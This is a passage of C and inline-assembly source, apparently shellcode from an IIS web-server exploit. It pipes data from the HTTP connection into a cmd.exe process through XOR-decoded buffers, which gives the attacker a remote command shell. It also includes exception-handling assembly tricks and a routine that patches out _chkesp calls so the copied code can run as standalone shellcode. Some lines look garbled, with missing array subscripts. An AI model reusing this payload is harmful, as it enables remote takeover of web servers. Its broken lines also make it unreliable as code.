\t       writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC);
\t   }
\t}
\telse{
\t      lBytesRead=SHELLBUFFSIZE;
\t      k=readclient(ConnID,Buff,&lBytesRead);
\t      // ReadClient returns 1 on success; anything else ends the session.
\t      if(k!=1){
\t\tk=8;
\t\tWriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
\t\tWriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
\t\tWriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
\t\twhile(1){
\t\t  Sleepadd(0x7fffffff);\t\t  // hang forever  
\t\t}    
\t    
\t      }
\t      else{
\t\tfor(k=0;k<lBytesRead;++k){
\t\t  lockintvar1=lockintvar1*0x100;
\t\t  lockintvar1=lockintvar1%LOCKBIGNUM;
\t\t  lockcharvar=lockintvar1%0x100;
\t\t  Buff[k]^=lockcharvar;   // DATAXORCODE;
//\t\t Buff[k]^=DATAXORCODE;
\t\t}
\t\tWriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
//\t     Sleepadd(1000);
\t      }
\t}
   }
   
   // Reached only when GetProcAddress was not found: spin forever.
   die: goto die  ;
\t_asm{

getexceptretadd:   pop  eax
\t\t   push eax
\t\t   mov  edi,dword ptr [stradd]
\t\t   mov dword ptr [edi-0x0e],eax
\t\t   ret
errprogram:\t   mov eax,dword ptr [esp+0x0c]
\t\t   add eax,0xb8
\t\t   mov dword ptr [eax],0x11223344  //stradd-0xe
\t\t   xor eax,eax\t\t//2
\t\t   ret\t\t\t//1
execptprogram:     jmp errprogram\t    //2 bytes     stradd-7
nextcall:\t  call getstradd\t    //5 bytes
\t\t   NOP
\t\t   NOP
\t\t   NOP
\t\t   NOP
\t\t   NOP
\t\t   NOP
\t\t   NOP
\t\t   NOP
\t\t   NOP
\t}\t
}



/*
 * Removes the compiler-inserted _chkesp() calls from a copied function body so
 * that the copy no longer depends on the CRT being present at the same address.
 *
 * fnadd     address the bytes were copied from (used to resolve call targets)
 * shellbuff the copy, patched in place
 * chkesp    resolved address of _chkesp (main() follows the 0xe9 thunk first)
 * len       number of bytes in shellbuff
 *
 * For every 0xe8 (call rel32) whose target, computed relative to fnadd,
 * equals chkesp, the 5-byte call is replaced by nop / inc ebx / dec ebx /
 * inc ebx / dec ebx, so the code keeps its length and ebx keeps its value.
 * NOTE(review): `temp=shellbuff;` and `shellbuff=0x90;` read as if their
 * "[i]" subscripts were lost in the page rendering.
 */
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
  int i,k;
  unsigned char temp;
  char *calladd;

  for(i=0;i<len;++i){
      temp=shellbuff;
      if(temp==0xe8){
\t k=*(int *)(shellbuff+i+1);
\t calladd=fnadd;
\t calladd+=k;
\t calladd+=i;
\t calladd+=5;
\t if(calladd==chkesp){
\t     shellbuff=0x90;
\t     shellbuff[i+1]=0x43;   // inc ebx
\t     shellbuff[i+2]=0x4b;    // dec ebx
\t     shellbuff[i+3]=0x43;
\t     shellbuff[i+4]=0x4b;
\t }
      }
  }
}